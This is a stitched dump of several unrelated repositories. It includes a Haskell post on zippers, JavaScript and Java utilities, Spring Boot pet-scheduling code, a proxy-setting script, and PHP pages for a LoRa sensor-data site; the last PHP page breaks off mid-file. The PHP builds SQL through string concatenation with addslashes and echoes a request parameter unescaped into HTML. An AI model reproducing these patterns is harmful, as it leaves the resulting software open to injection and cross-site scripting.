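plug v (Snd left)  = Pair left v  -- the hole was on the right: (left, *)

-- plug 5 (Fst 7) == Pair 5 7
-- plug 7 (Snd 5) == Pair 5 7
```
To confirm this theory, the alchemist tried applying the same idea to the list type, which demanded of him a certain amount of algebraic ingenuity: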
```
List x = 1 + x * List x
List x - x * List x = 1
List x * (1 - x) = 1
List x = 1 / (1 - x)
d/dx List x = d/dx 1 / (1 - x)
d/dx List x = 1 / (1 - x)²
d/dx List x = 1 / (1 - x) * 1 / (1 - x)
d/dx List x = List x * List x
data DeltaList x = Split (List x) (List x)
```
This tells us that the derivative of the list type is nothing more than two lists. And that also makes sense, because to focus on one point of a list we need two lists: one with the elements to the left of the focus, and another with the elements to the right. For example, if we build a list of 5 elements, we can focus on the middle element as `[1, 2, *, 4, 5]`, which can be represented by the `DeltaList` type as `Split [1, 2] [4, 5]`.
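Here is a minimal sketch of that list zipper, using Haskell's built-in lists for brevity; the `plugList` and `focusAll` helpers are my own names, not from the original post.
```
-- Minimal sketch (helper names are mine): the derivative of a list is a pair
-- of lists, the elements to the left and to the right of the hole.
data DeltaList x = Split [x] [x] deriving Show

-- Plugging a value back into the hole reconstructs the original list.
plugList :: x -> DeltaList x -> [x]
plugList v (Split left right) = left ++ [v] ++ right

-- Every way of focusing on one position of a list.
focusAll :: [x] -> [(x, DeltaList x)]
focusAll xs = [(x, Split (take i xs) (drop (i + 1) xs)) | (i, x) <- zip [0 ..] xs]

-- plugList 3 (Split [1, 2] [4, 5]) == [1, 2, 3, 4, 5]
-- focusAll "abc" == [('a', Split "" "bc"), ('b', Split "a" "c"), ('c', Split "ab" "")]
```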
Unfortunately, the truth about the interconnection between types and algebraic equations was too powerful even for our brave alchemist, who soon lost his sanity and vanished off the map. His whereabouts remain unknown to this day, but legend has it that he is still among us, wandering through some quiet village, eating radioactive bananas and trying to derive the type of monads.
<file_sep>/web/src/StateList.js
// Adds a state to the list of states
// It only keeps log(N) states, where N is the amount of ticks recorded
function push(new_state, states) {
if (states === null) {
// First state stored at this depth
return {bit: 0, state: new_state, older: null};
} else {
var {bit, state, older} = states;
if (bit === 0) {
// Flip the bit and keep the existing state; the incoming state is
// dropped, so each depth only retains every other state it receives
return {bit: 1, state, older};
} else {
// Replace this depth's state and carry the old one a level deeper,
// like incrementing a binary counter; this is what keeps ~log(N) states
return {bit: 0, state: new_state, older: push(state, older)};
}
}
}
// Finds the latest state that happened before a tick
function latest(before_tick, states) {
if (states === null) {
return null;
} else {
if (states.state.tick < before_tick) {
return states.state;
} else {
return latest(before_tick, states.older);
}
}
}
function show(states) {
if (states === null) {
console.log("END");
} else {
console.log((new Date(states.state.tick * 62.5)).toUTCString());
show(states.older);
}
}
module.exports = {
push,
latest,
show
};
<file_sep>/bin/bootstrap.js
var {execSync} = require("child_process");
var fs = require("fs");
var path = require("path");
var {fmc_to_js, fmc_to_hs, fmc} = require("formcore-js"); // FormCore, which has the JS compiler
//var {fmc_to_js, fmc_to_hs} = require("./../../FormCoreJS");
var kind_path = path.join(__dirname, "js/src/kind.js");
process.chdir(path.join(__dirname, "../base"));
// Restores last kind.js from git in case we destroyed it
execSync("git checkout "+kind_path);
// Creates kind.js
console.log("Generating kind.js");
execSync("kind Kind.api.export --js --module | js-beautify >> "+kind_path+".tmp");
execSync("mv "+kind_path+".tmp "+kind_path);
<file_sep>/.github/ISSUE_TEMPLATE/bug_report.md
---
name: 🐛 Bug report
about: Create a report to help us improve
title: ''
labels: bug
assignees: ''
---
### Describe the bug
A clear and concise description of what the bug is. You can paste the code and error to help us see the context.
### To Reproduce
Steps to reproduce the behavior:
1. Write the code on '...'
2. Use the command '...'
### Expected behavior
A clear and concise description of what you expected to happen.
### Environment (please complete the following information):
- OS: [e.g. iOS]
- Kind version [e.g. kind@1.0.53]
### Additional context
Add any other context about the problem here.
|
814a13e5bb91d9796d61aed099573d0cc07875ae
|
[
"JavaScript",
"Makefile",
"Markdown",
"Shell"
] | 25
|
JavaScript
|
Kix205/Kind
|
d7709263b45606a249a4f4e952122e58f8c28e4f
|
856826c94ac8360e6787b518a16ba96fc5143e9e
|
refs/heads/master
|
<file_sep>package juliostepstone;
import org.jsoup.Jsoup;
import org.jsoup.helper.Validate;
import org.jsoup.nodes.Document;
import org.jsoup.nodes.Element;
import org.jsoup.select.Elements;
import java.io.IOException;
import java.net.URL;
import java.util.ArrayList;
import java.util.List;
import java.util.Scanner;
/**
* StepStone:
*
* Program to list links from a URL.
*
* @author Julio.
*/
public class ListLinks {
public static Scanner scan= null;
public static Controller controller= null;
public static Elements links = null;
public static void main(String[] args) throws IOException {
//Declarations
scan = new Scanner (System.in);
System.out.println("Escribe la web http: ");
String url= scan.nextLine();
controller = new Controller(url);
links = controller.loadLink(url);
controller.showLinks(links);
}
}
|
225dc045ad8ed243e62933cd64edbe4d37fa59d6
|
[
"Java"
] | 1
|
Java
|
deyko/StepStoneJulio
|
6166b77904f2baad88436505fe14612b19a2a988
|
90697dbffab98a525fba8e43ef8c42efeeb77f81
|
refs/heads/master
|
<file_sep># Tools
## SetProxy
set the machine proxy according to predefined settings
### How to use:
`setproxy.bat $1` - set proxy parameters for git/npm
$1 - work/home
## GitConfig
set your project gitconfig file with predefined settings
### How to use:
`git init --template=<path_to_gitconfig_folder>`
<file_sep>#!/bin/bash
echo "Setting proxy settings to $1"
if [ $1 == "home" ]
then
setx HTTP_PROXY "" -m
setx HTTPS_PROXY "" -m
else
setx HTTPS_PROXY http://proxy.wdf.sap.corp:8080 -m
setx HTTP_PROXY http://proxy.wdf.sap.corp:8080 -m
fi
|
8520343efaecd1038c8fcda6259c9cde008835b3
|
[
"Markdown",
"Shell"
] | 2
|
Markdown
|
adibiton/Tools
|
d5ecf69b0b741c8ca4438037c68c03cb275e6f28
|
abdd8e1d1f31f1e3868c5baa3d8fee1a063d081f
|
refs/heads/master
|
<repo_name>Leo70kg/Critter-Chronologer<file_sep>/src/main/java/com/udacity/jdnd/course3/critter/exception/OwnerNotFoundException.java
package com.udacity.jdnd.course3.critter.exception;
import org.springframework.http.HttpStatus;
import org.springframework.web.bind.annotation.ResponseStatus;
@ResponseStatus(value = HttpStatus.NOT_FOUND, reason = "Owner not found")
public class OwnerNotFoundException extends RuntimeException{
}
<file_sep>/src/main/java/com/udacity/jdnd/course3/critter/service/ScheduleService.java
package com.udacity.jdnd.course3.critter.service;
import com.udacity.jdnd.course3.critter.entity.Customer;
import com.udacity.jdnd.course3.critter.entity.Employee;
import com.udacity.jdnd.course3.critter.entity.Pet;
import com.udacity.jdnd.course3.critter.entity.Schedule;
import com.udacity.jdnd.course3.critter.exception.CustomerNotFoundException;
import com.udacity.jdnd.course3.critter.repository.CustomerRepository;
import com.udacity.jdnd.course3.critter.repository.EmployeeRepository;
import com.udacity.jdnd.course3.critter.repository.PetRepository;
import com.udacity.jdnd.course3.critter.repository.ScheduleRepository;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.util.ArrayList;
import java.util.List;
import java.util.Optional;
@Service
public class ScheduleService {
@Autowired
ScheduleRepository scheduleRepository;
@Autowired
PetRepository petRepository;
@Autowired
EmployeeRepository employeeRepository;
@Autowired
CustomerRepository customerRepository;
public Schedule addSchedule(Schedule schedule) {
return scheduleRepository.save(schedule);
}
public List<Schedule> getAllSchedules() {
return scheduleRepository.findAll();
}
public List<Schedule> getSchedulesByPet(Pet pet) {
return scheduleRepository.getSchedulesByPets(pet);
}
public List<Schedule> getScheduleByEmployeeId(Long employeeId) {
Employee employee = employeeRepository.getOne(employeeId);
return scheduleRepository.getSchedulesByEmployees(employee);
}
public List<Schedule> getScheduleByCustomerId(Long customerId) {
List<Schedule> scheduleList = new ArrayList<>();
Optional<Customer> customer = customerRepository.findById(customerId);
if (!customer.isPresent()) {
throw new CustomerNotFoundException();
}
List<Pet> petList = petRepository.findPetsByCustomerEquals(customer.get());
petList.forEach(pet -> scheduleList.addAll(scheduleRepository.getSchedulesByPets(pet)));
return scheduleList;
}
}
<file_sep>/src/main/java/com/udacity/jdnd/course3/critter/schedule/ScheduleController.java
package com.udacity.jdnd.course3.critter.schedule;
import com.udacity.jdnd.course3.critter.entity.Employee;
import com.udacity.jdnd.course3.critter.entity.Pet;
import com.udacity.jdnd.course3.critter.entity.Schedule;
import com.udacity.jdnd.course3.critter.service.EmployeeService;
import com.udacity.jdnd.course3.critter.service.PetService;
import com.udacity.jdnd.course3.critter.service.ScheduleService;
import org.springframework.beans.BeanUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.*;
import java.util.ArrayList;
import java.util.List;
import java.util.stream.Collectors;
/**
* Handles web requests related to Schedules.
*/
@RestController
@RequestMapping("/schedule")
public class ScheduleController {
@Autowired
ScheduleService scheduleService;
@Autowired
EmployeeService employeeService;
@Autowired
PetService petService;
@PostMapping
public ScheduleDTO createSchedule(@RequestBody ScheduleDTO scheduleDTO) {
return convertScheduleToScheduleDTO(scheduleService.addSchedule(convertScheduleDTOToSchedule(scheduleDTO)));
}
@GetMapping
public List<ScheduleDTO> getAllSchedules() {
List<Schedule> scheduleList = scheduleService.getAllSchedules();
return convertScheduleToScheduleDTO(scheduleList);
}
@GetMapping("/pet/{petId}")
public List<ScheduleDTO> getScheduleForPet(@PathVariable long petId) {
Pet pet = petService.getPetById(petId);
List<Schedule> scheduleList = scheduleService.getSchedulesByPet(pet);
return convertScheduleToScheduleDTO(scheduleList);
}
@GetMapping("/employee/{employeeId}")
public List<ScheduleDTO> getScheduleForEmployee(@PathVariable long employeeId) {
return convertScheduleToScheduleDTO(scheduleService.getScheduleByEmployeeId(employeeId));
}
@GetMapping("/customer/{customerId}")
public List<ScheduleDTO> getScheduleForCustomer(@PathVariable long customerId) {
return convertScheduleToScheduleDTO(scheduleService.getScheduleByCustomerId(customerId));
}
private ScheduleDTO convertScheduleToScheduleDTO(Schedule schedule){
ScheduleDTO scheduleDTO = new ScheduleDTO();
BeanUtils.copyProperties(schedule, scheduleDTO);
List<Long> petIds = schedule.getPets().stream().map(Pet::getId).collect(Collectors.toList());
List<Long> employeeIds = schedule.getEmployees().stream().map(Employee::getId).collect(Collectors.toList());
scheduleDTO.setPetIds(petIds);
scheduleDTO.setEmployeeIds(employeeIds);
return scheduleDTO;
}
private Schedule convertScheduleDTOToSchedule(ScheduleDTO scheduleDTO){
Schedule schedule = new Schedule();
BeanUtils.copyProperties(scheduleDTO, schedule);
List<Employee> employeeList = scheduleDTO.getEmployeeIds().stream().map(employeeService::getEmployeeById).collect(Collectors.toList());
List<Pet> petList = scheduleDTO.getPetIds().stream().map(petService::getPetById).collect(Collectors.toList());
schedule.setEmployees(employeeList);
schedule.setPets(petList);
return schedule;
}
private List<ScheduleDTO> convertScheduleToScheduleDTO(List<Schedule> scheduleList) {
List<ScheduleDTO> scheduleDTOList = new ArrayList<>();
for (Schedule schedule: scheduleList) {
scheduleDTOList.add(convertScheduleToScheduleDTO(schedule));
}
return scheduleDTOList;
}
}
<file_sep>/src/main/java/com/udacity/jdnd/course3/critter/user/UserController.java
package com.udacity.jdnd.course3.critter.user;
import com.udacity.jdnd.course3.critter.entity.Customer;
import com.udacity.jdnd.course3.critter.entity.Employee;
import com.udacity.jdnd.course3.critter.entity.Pet;
import com.udacity.jdnd.course3.critter.pet.PetDTO;
import com.udacity.jdnd.course3.critter.service.CustomerService;
import com.udacity.jdnd.course3.critter.service.EmployeeService;
import org.springframework.beans.BeanUtils;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.web.bind.annotation.*;
import java.time.DayOfWeek;
import java.util.ArrayList;
import java.util.List;
import java.util.Set;
/**
* Handles web requests related to Users.
*
* Includes requests for both customers and employees. Splitting this into separate user and customer controllers
* would be fine too, though that is not part of the required scope for this class.
*/
@RestController
@RequestMapping("/user")
public class UserController {
@Autowired
CustomerService customerService;
@Autowired
EmployeeService employeeService;
@PostMapping("/customer")
public CustomerDTO saveCustomer(@RequestBody CustomerDTO customerDTO){
Customer savedCustomer = customerService.addCustomer(convertCustomerDTOToCustomer(customerDTO));
return convertCustomerToCustomerDTO(savedCustomer);
}
@GetMapping("/customer")
public List<CustomerDTO> getAllCustomers(){
List<Customer> customerList = customerService.getAllCustomers();
List<CustomerDTO> customerDTOList = new ArrayList<>();
for (Customer customer: customerList) {
customerDTOList.add(convertCustomerToCustomerDTO(customer));
}
return customerDTOList;
}
@GetMapping("/customer/pet/{petId}")
public CustomerDTO getOwnerByPet(@PathVariable long petId){
return convertCustomerToCustomerDTO(customerService.getCustomerByPetId(petId));
}
@PostMapping("/employee")
public EmployeeDTO saveEmployee(@RequestBody EmployeeDTO employeeDTO) {
return convertEmployeeToEmployeeDTO(employeeService.addEmployee(convertEmployeeDTOToEmployee(employeeDTO)));
}
@GetMapping("/employee/{employeeId}")
public EmployeeDTO getEmployee(@PathVariable long employeeId) {
return convertEmployeeToEmployeeDTO(employeeService.getEmployeeById(employeeId));
}
@PutMapping("/employee/{employeeId}")
public void setAvailability(@RequestBody Set<DayOfWeek> daysAvailable, @PathVariable long employeeId) {
employeeService.setAvailabilityById(daysAvailable, employeeId);
}
@GetMapping("/employee/availability")
public List<EmployeeDTO> findEmployeesForService(@RequestBody EmployeeRequestDTO employeeDTO) {
List<Employee> employeeList = employeeService.getEmployeeService(employeeDTO);
List<EmployeeDTO> employeeDTOList = new ArrayList<>();
for (Employee employee: employeeList) {
employeeDTOList.add(convertEmployeeToEmployeeDTO(employee));
}
return employeeDTOList;
}
private CustomerDTO convertCustomerToCustomerDTO(Customer customer) {
CustomerDTO customerDTO = new CustomerDTO();
BeanUtils.copyProperties(customer, customerDTO);
List<Pet> petSet = customer.getPets();
List<Long> petIdList = new ArrayList<>();
if (petSet != null) {
for (Pet pet: petSet) {
petIdList.add(pet.getId());
}
}
customerDTO.setPetIds(petIdList);
return customerDTO;
}
private Customer convertCustomerDTOToCustomer(CustomerDTO customerDTO){
Customer customer = new Customer();
BeanUtils.copyProperties(customerDTO, customer);
return customer;
}
private EmployeeDTO convertEmployeeToEmployeeDTO(Employee employee){
EmployeeDTO employeeDTO = new EmployeeDTO();
BeanUtils.copyProperties(employee, employeeDTO);
return employeeDTO;
}
private Employee convertEmployeeDTOToEmployee(EmployeeDTO employeeDTO) {
Employee employee = new Employee();
BeanUtils.copyProperties(employeeDTO, employee);
return employee;
}
}
|
bb2ed0aaf6d705169d0a79e0c1d3f3144dbeceef
|
[
"Java"
] | 4
|
Java
|
Leo70kg/Critter-Chronologer
|
77ab5eed20dce175ac6ea72a720072a61d87a05c
|
c06b61052f772efce2d281676e11693c3928a2e6
|
refs/heads/master
|
<file_sep><?php
include('db.php');
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
$limit = '';
if(isset($_REQUEST['limit'])) {
$limit = $_REQUEST['limit'];
}
$daysback = 0;
if(isset($_REQUEST['daysback'])) {
if(is_numeric($_REQUEST['daysback'])) {
$daysback = abs(addslashes($_REQUEST['daysback']));
$startDay = $daysback*-1 - 1;
}
}
if(!isset($_REQUEST['admin'])) {
if(in_array($_REQUEST['id'], $GLOBALS['nodefilter'])) {
die('oops, deze pagina is niet beschikbaar');
}
}
?>
<!DOCTYPE html>
<html class="no-js">
<head>
<meta http-equiv="refresh" content="60">
<?php
include('headinclude.php');
?>
<link rel="stylesheet" href="https://apeldoornindata.nl/style/detailpages.css" >
</head>
<body>
<?php
include('menu.php');
echo '<div class="container-fluid">'."\n";
$sql = 'SELECT * FROM node WHERE id = '.addslashes($_REQUEST['id']);
//echo $sql;
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
//var_dump($row);
$arrPoints = null;
$sql1 = 'SELECT point.id AS \'Id\', point.name AS \'Name\', unit.Unit AS \'Unit\' FROM point, unit WHERE point.Nodeid = '.addslashes($row['Id']).' AND point.Unitid = unit.Id';
//echo $sql.'<br/>';
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$arrPoints[] = array('id' => $row1['Id'], 'name' => $row1['Name'], 'unit' => $row1['Unit']);
}
if($arrPoints != null) {
$sql2 = '';
foreach($arrPoints as $point) {
if($sql2 != '') {
$sql2 .= ' UNION ';
}
$sql2 .= 'SELECT \''.$point['id'].'\' AS \'Tagid\', Moment, Tagvalue FROM measurement'.$point['id'];
if($daysback == 0) {
$sql2 .= ' WHERE Moment >= DATE_ADD(NOW(), INTERVAL -1 DAY)';
} else {
$sql2 .= ' WHERE Moment >= DATE_ADD(NOW(), INTERVAL '.$startDay.' DAY) AND Moment < DATE_ADD(NOW(), INTERVAL -'.$daysback.' DAY)';
}
}
$sql2 .= ' ORDER BY Moment DESC, Tagid ASC';
//echo $sql2;
$lastData = null;
$i = -1;
$result2 = mysqlquery($sql2);
while ($row2 = mysqli_fetch_array($result2))
{
//var_dump($row2);
if($lastData != $row2['Moment']) {
$i++;
$lastData = $row2['Moment'];
}
$data[$i]['Moment'] = $row2['Moment'];
$data[$i][$row2['Tagid']] = $row2['Tagvalue'];
}
} else {
echo 'Geen data beschikbaar';
}
//var_dump($data);
echo '<h1>'.$row['Name'].'</h1>'."\n";
echo '<iframe src="'.$GLOBALS['urldata'].'chartnode.php?id='.$_REQUEST['id'].'&limit='.$limit.'&daysback='.$daysback.'" frameborder="0" height="300" width="100%" scrolling="no"></iframe>';
echo '<br/><a href="'.$GLOBALS['urldata'].'node.php?id='.$_REQUEST['id'].'&daysback='.abs($daysback+1);
if(isset($_GET['admin'])) {
echo '&admin=1';
}
echo '"><button type="button" class="btn btn-default"><span class="glyphicon glyphicon-chevron-left"></button></a><a href="'.$GLOBALS['urldata'].'node.php?id='.$_REQUEST['id'];
if(isset($_GET['admin'])) {
echo '&admin=1';
}
echo '"><button type="button" class="btn btn-default"><span class="glyphicon glyphicon-stop"></button></a>';
if($daysback > 0) {
echo '<a href="'.$GLOBALS['urldata'].'node.php?id='.$_REQUEST['id'].'&daysback='.abs($daysback-1);
if(isset($_GET['admin'])) {
echo '&admin=1';
}
echo '"><button type="button" class="btn btn-default"><span class="glyphicon glyphicon-chevron-right"></button></a><br/><br/>'."\n";
} else {
echo '<button type="button" class="btn btn-default" disabled="true"><span class="glyphicon glyphicon-chevron-right"></button><br/><br/>'."\n";
}
echo '<a href="https://apeldoornindata.nl/data/nodeexport.php?id='.$_REQUEST['id'].'&limit=2000"><img src="https://apeldoornindata.nl/images/csv.png" alt="CSV export"></a><br/><br/>'."\n";
if(in_array($_REQUEST['id'], array(87, 120))) {
echo 'Deze sensor hangt in vergaderzaak 1B bij Hollander Techniek in Apeldoorn.<br/><br/>';
echo 'Kijk voor meer informatie over IoT bij Hollander Techniek op <a href="https://www.iotinsights.nl/" target="_blank">iotinsights.nl</a><br/>';
echo '<h3>Luchtvochtigheid (Rode lijn)</h3>
Zowel thuis als op kantoor zou de relatieve luchtvochtigheid tussen de 40 en 60 procent moet liggen.<br/>
Bij een te lage luchtvochtigheid krijgen veel mensen last van geïrriteerde luchtwegen, barstjes in de lippen, droge ogen of soms zelfs huidklachten.<br/>
Een te hoge luchtvochtigheid kan schimmel veroorzaken.<br/>
<h3>CO2 (Paarse lijn)</h3>
Herken je een bedompte lucht, benauwde atmosfeer of nare luchtjes? Kijk dan eens naar de CO2 waarde.<br/>
Een goede kwaliteit binnenlucht bevat minder dan 0,1 volume procent CO2 (1000 ppm)<br/>
<br/>
<img src="../images/co2.png" /><br/>
<h3>Temperatuur (Donker blauwe lijn)</h3>
22 graden levert de beste prestaties op op de werkvloer. Voor vrouwen zou het zelfs om 24,5 graden gaan.<br/>
De ideale kamertemperatuur voor een gemengd bedrijf zou dus rond de 23 graden liggen.<br/>
<h3>Lichtintensiteit (Oranje lijn)</h3>
Licht beïnvloedt de stemming, eetlust en alertheid. Daglicht zorgt voor de beste productiviteit.<br/>
In een vergaderruimte is minimaal 500 lux wenselijk. Heb je een creatieve sessie? Zet het lucht gerust wat zachter.<br/>
Schermerlicht zorgt volgens onderzoek voor meer vindingrijkheid!<br/>
<h3>Beweging (Groene lijn)</h3>
Is er iemand aanwezig geweest in de ruimte? Dit kun je zien aan de beweging sensor.<br/>
Is er een periode lang geen beweging geweest, dan is de ruimte ook niet gebruikt.<br/>
<h3>Batterijspanning (Lichtblauwe lijn)</h3>
De sensor werk met LoRa technologie. De enige voeding is een batterij. Wel zo handig om de spanning te weten, zodat je de batterij tijdig kunt vervangen.<br/><br/><br/>';
}
echo '<table border="1">'."\n";
echo '<tr><th>Moment</th>';
//var_dump($arrPoints);
foreach((array) $arrPoints as $point) {
//var_dump($point);
echo '<th>'.$point['name'].' ['.$point['unit'].']</th>';
}
echo '</tr>'."\n";
//var_dump($data);
if(isset($data)) {
foreach($data as $dataMoment) {
echo '<tr>';
echo '<td>'.$dataMoment['Moment'].'</td>';
foreach($arrPoints as $point) {
echo '<td class="alnright">';
if(array_key_exists($point['id'], $dataMoment)) {
$waarde = str_replace('0000', '', str_replace('.00000', '', $dataMoment[$point['id']]));
if(substr($waarde, -3) == '000'){
$waarde = substr($waarde, 0, -3);
}
if($waarde == '') {
$waarde = 0;
}
echo $waarde;
} else {
echo ' ';
}
//echo $dataMoment[$point['id']];
echo '</td>';
}
echo '</tr>'."\n";
}
} else {
echo '<tr><td>Geen data</td></tr>'."\n";
}
echo '</table>'."\n";
}
include('../footer.php');
echo '</div> <!-- /.container -->'."\n"; //container
include('jsendinclude.php');
?>
</body>
</html><file_sep><?php
include('db.php');
if(isset($_REQUEST['id'])) {
if(!is_numeric($_REQUEST['id'])) {
die("Invalid Id parameter");
}
}
$sql = 'SELECT * FROM node';
//echo $sql;
$interval = 'INTERVAL 24 HOUR';
if(isset($_REQUEST['select'])) {
if($_REQUEST['select'] == 'all') {
$interval = 'INTERVAL 14 DAY';
}
}
$arrSensorData = array("type" => "FeatureCollection", "features" => array());
$arrMeasurement = array();
$result = mysqlquery($sql);
while ($row = mysqli_fetch_array($result))
{
$nodeHasData = false;
$arrMeasurementItem = null;
$arrProperties = array();
$sql1 = 'SELECT point.*, unit.Unit FROM point INNER JOIN unit ON point.Unitid = unit.Id WHERE Nodeid = '.$row["Id"];
//echo $sql1;
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
$sql2 = 'SELECT * FROM measurement'.$row1["Id"].' WHERE Moment >= DATE_SUB(NOW(), '.$interval.') ORDER BY Moment DESC LIMIT 1';
//echo $sql2;
$result2 = mysqlquery($sql2);
while ($row2 = mysqli_fetch_array($result2))
{
//var_dump($row1);
$arrProperties = null;
$arrProperties["type"] = "sensor";
$arrProperties["id"] = $row1["Id"];
$arrProperties["location"] = $row["Name"];
$arrProperties["name"] = $row1["Name"];
$arrProperties["value"] = ($row2["Tagvalue"] + 0).' '.$row1["Unit"];
$arrProperties["timestamp"] = $row2["Moment"];
$arrProperties["nodeid"] = $row["Id"];
$arrMeasurementItem["properties"][] = $arrProperties;
$nodeHasData = true;
}
}
//var_dump($arrProperties);
$arrMeasurementItem["type"] = "Feature";
$arrMeasurementItem["name"] = $row["Name"];
$arrMeasurementItem["geometry"] = array("type" => "Point", "coordinates" => array(floatval($row["Lastlocationlon"]), floatval($row["Lastlocationlat"])));
//arrSensorData["features"][] = array("type" => "Feature");
//var_dump($row);
if($nodeHasData)
{
$arrMeasurement[] = $arrMeasurementItem;
}
}
$arrSensorData["features"] = $arrMeasurement;
echo json_encode($arrSensorData, JSON_PRETTY_PRINT);
exit();
?>
{
"type": "FeatureCollection",
"features": [{
"type": "Feature",
"properties": {
"type": "sensor",
"id": "1",
"temperature": "24.9375",
"humidity": "30.3125",
"timestamp_utc": "2017-06-01 14:30:35",
"timestamp": "2017-06-01 16:30:35",
"location": "Industrial IT"
},
"geometry": {
"type": "Point",
"coordinates": [5.943877, 52.1843 ]
}
}
]
}<file_sep><?php
include('db.php');
?>
<!DOCTYPE html>
<html class="no-js">
<head>
<meta http-equiv="refresh" content="60">
<?php
include('headinclude.php');
?>
<link rel="stylesheet" href="https://apeldoornindata.nl/style/detailpages.css" >
<script type="text/javascript" src="https://www.gstatic.com/charts/loader.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script type="text/javascript">
// Load the Visualization API and the piechart package.
google.charts.load('current', {'packages':['corechart']});
// Set a callback to run when the Google Visualization API is loaded.
google.charts.setOnLoadCallback(drawChart);
function drawChart() {
var chart = new google.visualization.ColumnChart(document.getElementById('chart_div'));
var jsonData = $.ajax({
url: "chartdata.php?id=1&type=messages",
dataType: "json",
async: false
}).responseText;
options = {
chartArea : { left: 80, right: 50, top:10, bottom: 50},
vAxis: {format:'#.#'},
legend: {position: 'none'},
hAxis: {
format: 'dd/MM/yyyy HH',
},
height: 300
};
data = new google.visualization.DataTable();
data.addColumn('datetime', 'Time');
data.addColumn('number', 'Messages');
data.insertRows(0, eval(jsonData));
var date_formatter = new google.visualization.DateFormat({
pattern: "dd/MM/yyyy HH:mm"
});
date_formatter.format(data, 0);
chart.draw(data, options);
}
</script>
</head>
<body>
<?php
include('menu.php');
echo '<div class="container-fluid">'."\n";
echo '<div id="chart_div"></div>'."\n";
$sql = 'SELECT * FROM loraraw ORDER BY Moment DESC LIMIT 500';
//echo $sql;
$result = mysqlquery($sql);
echo '<table border="1">';
echo '<tr><th>Moment</th><th>Node</th><th>Counter</th><th>Payload</th><th>Metadata</th><th>Gateway</th></tr>';
while ($row = mysqli_fetch_array($result))
{
$nodeId = 0;
$jsonData = json_decode($row['Data']);
$sql1 = 'SELECT * FROM node WHERE Devid = \''.addslashes($jsonData->dev_id).'\' AND Hwserial = \''.addslashes($jsonData->hardware_serial).'\' LIMIT 1';
//echo $sql1;
$result1 = mysqlquery($sql1);
while ($row1 = mysqli_fetch_array($result1))
{
if($row1['Id'] != null) {
$nodeId = $row1['Id'];
}
}
if(!isset($_REQUEST['admin'])) {
if(in_array($nodeId, $GLOBALS['nodefilter'])) {
continue;
}
}
$utc_date = DateTime::createFromFormat(
'Y-m-d H:i:s',
$row['Moment'],
new DateTimeZone('UTC')
);
$localTime = $utc_date;
$localTime->setTimeZone(new DateTimeZone('Europe/Amsterdam'));
echo '<tr><td valign="top">'.$localTime->format('Y-m-d H:i:s').'</td><td valign="top">';
//echo '<pre>';
//var_dump($jsonData);
if($nodeId != 0) {
echo '<a href="https://apeldoornindata.nl/data/node.php?id='.$nodeId.'">';
}
echo $jsonData->dev_id.'</a></td><td valign="top">';
echo $jsonData->counter.'</td><td valign="top">';
if(isset($jsonData->payload_fields)) {
foreach($jsonData->payload_fields as $key => $value) {
if(isset($key) && isset($value) && !is_null($key) && !is_null($value)){
echo $key;
echo ': ';
if(!is_object($value)) {
echo $value.'<br/>';
} else {
echo'##<br/>';
}
}
}
}
echo '</td>';
echo '<td valign="top">';
echo 'Time utc: '.$jsonData->metadata->time.'<br/>';
echo 'Datarate: '.$jsonData->metadata->data_rate.'<br/>';
echo 'Frequency: '.$jsonData->metadata->frequency.'<br/>';
echo 'Coding Rate: '.$jsonData->metadata->coding_rate.'<br/>';
echo '</td>';
echo '<td valign="top">';
foreach($jsonData->metadata->gateways as $key => $value) {
if(isset($value->latitude) && isset($value->longitude)) {
echo '<a href="https://www.google.nl/maps/search/'.$value->latitude.'+'.$value->longitude.'" target="_blanc">';
echo $value->gtw_id.'</a>';
}
elseif($value->gtw_id == 'eui-600194ffff078812'){
echo '<a href="https://www.google.nl/maps/search/52.184116+5.943786" target="_blanc">';
echo $value->gtw_id.'</a>';
}
else
{
echo $value->gtw_id;
}
if(isset($value->rssi)) {
echo ' - RSSI: '.$value->rssi;
}
if(isset($value->snr)) {
echo ' - SNR: '.$value->snr;
}
echo ' - Channel: '.$value->channel;
//echo '<br/>'.$value->gtw_id.'<br/>';
if($value->gtw_id == 'eui-0031552048001a03') {
echo ' - Mheen flat';
} elseif($value->gtw_id == 'eui-aa555a0000088213') {
echo ' - <NAME>';
} elseif($value->gtw_id == 'eui-aa555a0000088234') {
echo ' - <NAME>';
} elseif($value->gtw_id == 'ttn_apeldoorn_jfk2') {
echo ' - <NAME>';
} elseif($value->gtw_id == 'eui-a020a6ffff0bf72b') {
echo ' - Alex';
} elseif($value->gtw_id == 'eui-600194ffff0668a4') {
echo ' - RFSee';
} elseif($value->gtw_id == 'eui-1dee039210b8bc22') {
echo ' - Maarten-in';
} elseif($value->gtw_id == 'eui-1dee0eafc27cb263') {
echo ' - Oblivion';
} elseif($value->gtw_id == 'eui-84eb18ffffe1df5a') {
echo ' - Maarten-in 2';
} elseif($value->gtw_id == 'eui-0003ffff1d09ce86') {
echo ' - InterAct';
} elseif($value->gtw_id == 'eui-af5ee01293673410') {
echo ' - RFSee 2';
} elseif($value->gtw_id == 'pe1mew_development_gateway_1') {
echo ' - RFSee 3';
} elseif($value->gtw_id == 'pe1mew_development_gateway_2') {
echo ' - RFSee 4';
} elseif($value->gtw_id == 'pe1mew_development_gateway_3') {
echo ' - RFSee 5';
} elseif($value->gtw_id == 'eui-af5ee06136197950') {
echo ' - RFSee 6';
} elseif($value->gtw_id == 'eui-b827ebfffe0ee7c9') {
echo ' - Eddy';
} elseif($value->gtw_id == 'eui-0031552048001a06') {
echo ' - Kadaster';
} elseif($value->gtw_id == 'ttn_apeldoorn_kadaster') {
echo ' - Kadaster';
} elseif($value->gtw_id == 'ttn_deventer_grote-kerk') {
echo ' - Deventer - Grote kerk';
} elseif($value->gtw_id == 'ttn_apeldoorn_radiokootwijk') {
echo ' - Radio Kootwijk';
} elseif($value->gtw_id == 'eui-a020a6ffff1950d9') {
echo ' - Zutphen - Coehoornsingel';
} elseif($value->gtw_id == 'eui-0000024b08030035') {
echo ' - Harderwijk - Oosteinde';
